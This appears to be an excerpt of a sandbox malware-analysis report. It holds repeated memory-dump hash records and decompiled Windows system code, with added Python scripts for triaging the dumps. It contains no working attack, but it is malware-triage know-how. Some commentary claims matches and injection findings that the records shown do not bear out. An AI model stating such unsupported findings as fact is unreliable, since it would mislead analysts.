                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%
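The records above are all emitted in the same flat shape: a "Memory Dump Source" block naming the .sdmp region the instruction block was found in, a "Similarity" block with opcode and instruction hashes, and a "Uniqueness Score". When a report contains dozens of these for the same source dump, it is quicker to parse them and summarise per region than to read them one at a time. The following is an added example written for this page; it is not Joe Sandbox code. The split of the .sdmp file name into process index, dump sequence, timestamp, base address, page protection and region type is an assumption inferred from the values in the listing (the 0x40 protection value does equal the Windows PAGE_EXECUTE_READWRITE constant), and treating a negative uniqueness score as "not computed" is likewise an assumption. The embedded sample is constructed from two of the records above.

```python
"""Parse Joe Sandbox 'Memory Dump Source' / 'Similarity' records into
structured data and summarise them per source dump (added example, not
Joe Sandbox code; see the assumptions flagged in the comments)."""
import re
from collections import defaultdict

# Constructed sample: two records copied in the shape of the listing above.
SAMPLE = """\
Memory Dump Source
• Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
• Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
• Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
• Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
• Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
• Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
• Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
• Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
• Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
Uniqueness

Uniqueness Score: -1.00%
"""

PAGE_EXECUTE_READWRITE = 0x40  # Windows memory protection constant

# Field layout of the .sdmp name is an ASSUMPTION inferred from the listing.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.sdmp$"
)


def parse_sdmp_name(name):
    """Split a dump file name into its fields; flag RWX regions, which are the
    usual home of unpacked or injected code."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError("unrecognised dump name: %r" % name)
    prot = int(m.group("prot"), 16)
    return {
        "proc": int(m.group("proc"), 16),
        "seq": int(m.group("seq"), 16),
        "timestamp": int(m.group("ts")),
        "base": int(m.group("base"), 16),
        "protection": prot,
        "kind": int(m.group("kind"), 16),
        "rwx": prot == PAGE_EXECUTE_READWRITE,
    }


def parse_records(text):
    """Turn the flat listing into one dict per 'Memory Dump Source' record.
    Tolerates the bullet characters and a trailing 'Download File' link label."""
    records = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "Memory Dump Source":
            cur = {"associated": []}
            records.append(cur)
            continue
        if cur is None or ":" not in line:
            continue  # "Similarity", "Uniqueness", blank lines
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            name, _, rest = value.partition(",")  # "<name>, Offset: ..., based on PE: ..."
            cur["source"] = name.strip()
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", rest)
            cur["offset"] = int(off.group(1), 16) if off else None
            cur["based_on_pe"] = "based on PE: true" in rest
        elif key == "Associated":
            cur["associated"].append(value.split()[0])
        elif key == "Uniqueness Score":
            score = float(value.rstrip("%"))
            cur["uniqueness"] = None if score < 0 else score  # negative = not computed (assumption)
        elif key in ("Opcode ID", "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"):
            cur[key.lower().replace(" ", "_")] = value
        elif key in ("API ID", "String ID", "API String ID"):
            cur[key.lower().replace(" ", "_")] = value or None  # empty on this page
    return records


def summarize(records):
    """Group records by source dump: instruction-block count, distinct instruction
    fuzzy hashes, and the (base, is_rwx) regions the dump is associated with."""
    groups = defaultdict(lambda: {"count": 0, "instruction_hashes": set(), "regions": set()})
    for r in records:
        g = groups[r["source"]]
        g["count"] += 1
        g["instruction_hashes"].add(r["instruction_fuzzy_hash"])
        for name in [r["source"]] + r["associated"]:
            d = parse_sdmp_name(name)
            g["regions"].add((d["base"], d["rwx"]))
    return dict(groups)


if __name__ == "__main__":
    for src, g in summarize(parse_records(SAMPLE)).items():
        print(src, g["count"], "blocks,", len(g["instruction_hashes"]), "distinct hashes")
        for base, rwx in sorted(g["regions"]):
            print("  region 0x%08X %s" % (base, "RWX" if rwx else ""))
```

Run over the full listing, the summary collapses the repeated records into one line per source dump and shows that every region they reference in process index 5 is mapped PAGE_EXECUTE_READWRITE, which is consistent with the "based on PE: true" flag and the injection behaviour listed in the report summary.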

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%
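Every dump block above names one source region (0x950000) plus seven associated regions (0x940000, 0xA30000, 0xA40000, 0xA44000, 0xA47000, 0xA50000, 0xAB0000), all described as pieces of a single PE image based at 0x940000. When working such fragments by hand, the first question is which section of that image each fragment came from, and whether the header's preferred ImageBase matches the address it was actually mapped at (a mismatch means the image was relocated, which for a mapped system DLL deserves a second look). The Python below is an added triage example, not part of the Joe Sandbox report and not its code. It parses the PE section table from the bytes dumped at the image base and maps each fragment address to a section. Because the real section layout of the dumped image is not on this page, the script builds a constructed PE32 header with an invented .text/.data/.rsrc layout as a stand-in; for real use, pass the bytes of the first .sdmp in place of that constructed image.

```python
"""Map dumped memory fragments back to the sections of the PE image they belong to.

Added example for triaging sandbox memory dumps. The PE image built by
build_test_image() is constructed; its section layout is invented.
"""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(image):
    """Return (image_base, size_of_image, size_of_headers, sections) from raw PE bytes.

    Each section is (name, virtual_address, virtual_size, characteristics).
    Only the header fields needed for address mapping are read.
    """
    if image[:2] != b"MZ":
        raise ValueError("no MZ header at offset 0")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic == 0x10B:                                   # PE32: 4-byte ImageBase at +28
        image_base = struct.unpack_from("<I", image, opt + 28)[0]
    elif magic == 0x20B:                                 # PE32+: 8-byte ImageBase at +24
        image_base = struct.unpack_from("<Q", image, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    size_of_image, size_of_headers = struct.unpack_from("<II", image, opt + 56)
    sections = []
    for i in range(nsections):                           # section table follows the optional header
        off = opt + opt_size + 40 * i
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rawsize, _, _, _, _, _, chars = struct.unpack_from("<IIIIIIHHI", image, off + 8)
        sections.append((name, vaddr, max(vsize, rawsize), chars))
    return image_base, size_of_image, size_of_headers, sections


def locate_region(image, load_base, region_addr):
    """Describe where a fragment dumped at region_addr sits in the image loaded at load_base."""
    image_base, size_of_image, size_of_headers, sections = parse_pe(image)
    rva = region_addr - load_base
    result = {"rva": rva, "section": None, "executable": False, "writable": False,
              "relocated": image_base != load_base}  # header preferred a different base
    if not 0 <= rva < size_of_image:
        result["section"] = "(outside image)"
        return result
    if rva < size_of_headers:
        result["section"] = "(headers)"
        return result
    for name, vaddr, vsize, chars in sections:
        if vaddr <= rva < vaddr + vsize:
            result["section"] = name
            result["executable"] = bool(chars & IMAGE_SCN_MEM_EXECUTE)
            result["writable"] = bool(chars & IMAGE_SCN_MEM_WRITE)
            return result
    result["section"] = "(gap between sections)"
    return result


def build_test_image(image_base=0x940000):
    """Constructed PE32 header-only image with an invented layout (stand-in for the first .sdmp)."""
    layout = [  # (name, rva, size, characteristics): invented, not the real dump's sections
        (b".text", 0x1000, 0xEF000, 0x60000020),    # code, execute + read
        (b".data", 0xF0000, 0x80000, 0xC0000040),   # initialized data, read + write
        (b".rsrc", 0x170000, 0x10000, 0x40000040),  # resources, read
    ]
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, 28, image_base)                   # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)               # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x180000, 0x400)             # SizeOfImage, SizeOfHeaders
    secs = b"".join(
        name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", size, rva, size, 0x400, 0, 0, 0, 0, chars)
        for name, rva, size, chars in layout
    )
    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs).ljust(0x400, b"\0")


if __name__ == "__main__":
    image = build_test_image()
    # Fragment addresses as listed in the report; the section names come from the constructed layout.
    for addr in (0x940000, 0x950000, 0xA30000, 0xA40000, 0xA44000, 0xA47000, 0xA50000, 0xAB0000):
        r = locate_region(image, 0x940000, addr)
        print("%08X -> %-22s rva=%06X exec=%s write=%s relocated=%s"
              % (addr, r["section"], r["rva"], r["executable"], r["writable"], r["relocated"]))
```

Only the header bytes are needed for the mapping, so the first .sdmp alone suffices even when the other fragments are large. Replace `build_test_image()` with `open("....sdmp", "rb").read()` and keep `load_base` at the address the sandbox reports for that dump; if `relocated` comes back true, the header's preferred base did not match where the image was found.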

                                                C-Code - Quality: 94%
                                                			E00988788(signed int __ecx, void* __edx, signed int _a4) {
                                                				signed int _v8;
                                                				short* _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				char _v68;
                                                				void* _t216;
                                                				intOrPtr _t231;
                                                				short* _t235;
                                                				intOrPtr _t257;
                                                				short* _t261;
                                                				intOrPtr _t284;
                                                				intOrPtr _t288;
                                                				void* _t314;
                                                				signed int _t318;
                                                				short* _t319;
                                                				intOrPtr _t321;
                                                				void* _t328;
                                                				void* _t329;
                                                				char* _t332;
                                                				signed int _t333;
                                                				signed int* _t334;
                                                				void* _t335;
                                                				void* _t338;
                                                				void* _t339;
                                                
                                                				_t328 = __edx;
                                                				_t322 = __ecx;
                                                				_t318 = 0;
                                                				_t334 = _a4;
                                                				_v8 = 0;
                                                				_v28 = 0;
                                                				_v48 = 0;
                                                				_v20 = 0;
                                                				_v40 = 0;
                                                				_v32 = 0;
                                                				_v52 = 0;
                                                				if(_t334 == 0) {
                                                					_t329 = 0xc000000d;
                                                					L49:
                                                					_t334[0x11] = _v56;
                                                					 *_t334 =  *_t334 | 0x00000800;
                                                					_t334[0x12] = _v60;
                                                					_t334[0x13] = _v28;
                                                					_t334[0x17] = _v20;
                                                					_t334[0x16] = _v48;
                                                					_t334[0x18] = _v40;
                                                					_t334[0x14] = _v32;
                                                					_t334[0x15] = _v52;
                                                					return _t329;
                                                				}
                                                				_v56 = 0;
                                                				if(E00988460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_v56 = 1;
                                                					if(_v8 != 0) {
                                                						_t207 = E0096E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                					}
                                                					_push(1);
                                                					_v8 = _t318;
                                                					E0098718A(_t207);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_v60 = _v60 | 0xffffffff;
                                                				if(E00988460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_t333 =  *_v8;
                                                					_v60 = _t333;
                                                					_t314 = E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					_push(_t333);
                                                					_v8 = _t318;
                                                					E0098718A(_t314);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_t216 = E00988460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                				_t332 = ";";
                                                				if(_t216 < 0) {
                                                					L17:
                                                					if(E00988460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                						L30:
                                                						if(E00988460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                							L46:
                                                							_t329 = 0;
                                                							L47:
                                                							if(_v8 != _t318) {
                                                								E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                							}
                                                							if(_v28 != _t318) {
                                                								if(_v20 != _t318) {
                                                									E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                									_v20 = _t318;
                                                									_v40 = _t318;
                                                								}
                                                							}
                                                							goto L49;
                                                						}
                                                						_t231 = _v24;
                                                						_t322 = _t231 + 4;
                                                						_push(_t231);
                                                						_v52 = _t322;
                                                						E0098718A(_t231);
                                                						if(_t322 == _t318) {
                                                							_v32 = _t318;
                                                						} else {
                                                							_v32 = E0096E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                						}
                                                						if(_v32 == _t318) {
                                                							_v52 = _t318;
                                                							L58:
                                                							_t329 = 0xc0000017;
                                                							goto L47;
                                                						} else {
                                                							E00962340(_v32, _v8, _v24);
                                                							_v16 = _v32;
                                                							_a4 = _t318;
                                                							_t235 = E0097E679(_v32, _t332);
                                                							while(1) {
                                                								_t319 = _t235;
                                                								if(_t319 == 0) {
                                                									break;
                                                								}
                                                								 *_t319 = 0;
                                                								_t321 = _t319 + 2;
                                                								E0096E2A8(_t322,  &_v68, _v16);
                                                								if(E00985553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                								_v16 = _t321;
                                                								_t235 = E0097E679(_t321, _t332);
                                                								_pop(_t322);
                                                							}
                                                							_t236 = _v16;
                                                							if( *_v16 != _t319) {
                                                								E0096E2A8(_t322,  &_v68, _t236);
                                                								if(E00985553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                							}
                                                							if(_a4 == 0) {
                                                								E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                								_v52 = _v52 & 0x00000000;
                                                								_v32 = _v32 & 0x00000000;
                                                							}
                                                							if(_v8 != 0) {
                                                								E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                							}
                                                							_v8 = _v8 & 0x00000000;
                                                							_t318 = 0;
                                                							goto L46;
                                                						}
                                                					}
                                                					_t257 = _v24;
                                                					_t322 = _t257 + 4;
                                                					_push(_t257);
                                                					_v40 = _t322;
                                                					E0098718A(_t257);
                                                					_t338 = _t335 + 4;
                                                					if(_t322 == _t318) {
                                                						_v20 = _t318;
                                                					} else {
                                                						_v20 = E0096E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                					}
                                                					if(_v20 == _t318) {
                                                						_v40 = _t318;
                                                						goto L58;
                                                					} else {
                                                						E00962340(_v20, _v8, _v24);
                                                						_v16 = _v20;
                                                						_a4 = _t318;
                                                						_t261 = E0097E679(_v20, _t332);
                                                						_t335 = _t338 + 0x14;
                                                						while(1) {
                                                							_v12 = _t261;
                                                							if(_t261 == _t318) {
                                                								break;
                                                							}
                                                							_v12 = _v12 + 2;
                                                							 *_v12 = 0;
                                                							E0096E2A8(_v12,  &_v68, _v16);
                                                							if(E00985553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                							_v16 = _v12;
                                                							_t261 = E0097E679(_v12, _t332);
                                                							_pop(_t322);
                                                						}
                                                						_t269 = _v16;
                                                						if( *_v16 != _t318) {
                                                							E0096E2A8(_t322,  &_v68, _t269);
                                                							if(E00985553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                						}
                                                						if(_a4 == _t318) {
                                                							E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                							_v40 = _t318;
                                                							_v20 = _t318;
                                                						}
                                                						if(_v8 != _t318) {
                                                							E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                						}
                                                						_v8 = _t318;
                                                						goto L30;
                                                					}
                                                				}
                                                				_t284 = _v24;
                                                				_t322 = _t284 + 4;
                                                				_push(_t284);
                                                				_v48 = _t322;
                                                				E0098718A(_t284);
                                                				_t339 = _t335 + 4;
                                                				if(_t322 == _t318) {
                                                					_v28 = _t318;
                                                				} else {
                                                					_v28 = E0096E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                				}
                                                				if(_v28 == _t318) {
                                                					_v48 = _t318;
                                                					goto L58;
                                                				} else {
                                                					E00962340(_v28, _v8, _v24);
                                                					_v16 = _v28;
                                                					_a4 = _t318;
                                                					_t288 = E0097E679(_v28, _t332);
                                                					_t335 = _t339 + 0x14;
                                                					while(1) {
                                                						_v12 = _t288;
                                                						if(_t288 == _t318) {
                                                							break;
                                                						}
                                                						_v12 = _v12 + 2;
                                                						 *_v12 = 0;
                                                						E0096E2A8(_v12,  &_v68, _v16);
                                                						if(E00985553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                						_v16 = _v12;
                                                						_t288 = E0097E679(_v12, _t332);
                                                						_pop(_t322);
                                                					}
                                                					_t296 = _v16;
                                                					if( *_v16 != _t318) {
                                                						E0096E2A8(_t322,  &_v68, _t296);
                                                						if(E00985553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                					}
                                                					if(_a4 == _t318) {
                                                						E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                						_v48 = _t318;
                                                						_v28 = _t318;
                                                					}
                                                					if(_v8 != _t318) {
                                                						E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					}
                                                					_v8 = _t318;
                                                					goto L17;
                                                				}
                                                			}
                                                0x00988788
                                                0x00988788
                                                0x00988791
                                                0x00988794
                                                0x00988798
                                                0x0098879b
                                                0x0098879e
                                                0x009887a1
                                                0x009887a4
                                                0x009887a7
                                                0x009887aa
                                                0x009887af
                                                0x009d1ad3
                                                0x00988b0a
                                                0x00988b0d
                                                0x00988b13
                                                0x00988b19
                                                0x00988b1f
                                                0x00988b25
                                                0x00988b2b
                                                0x00988b31
                                                0x00988b37
                                                0x00988b3d
                                                0x00988b46
                                                0x00988b46
                                                0x009887c6
                                                0x009887d0
                                                0x009d1ae0
                                                0x009d1ae6
                                                0x009d1af8

                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00988914
                                                • WindowsExcludedProcs, xrefs: 009887C1
                                                • Kernel-MUI-Language-SKU, xrefs: 009889FC
                                                • Kernel-MUI-Number-Allowed, xrefs: 009887E6
                                                • Kernel-MUI-Language-Allowed, xrefs: 00988827
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: 9f217b05b70302129a97081d888544c18a2ed745f21fcd77e2999140f987ac8b
                                                • Instruction ID: bc9d12bfbb7ca700d3230fea7171e35bb3fb31d81ad98c51c9950f98a210d80f
                                                • Opcode Fuzzy Hash: 9f217b05b70302129a97081d888544c18a2ed745f21fcd77e2999140f987ac8b
                                                • Instruction Fuzzy Hash: 65F1F7B6D00209EFCF11EFA5C981EEEB7B9FF48300F54446AE505A7211EB359A45DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 38%
                                                			E009A13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _t71;
                                                				signed int _t78;
                                                				signed int _t86;
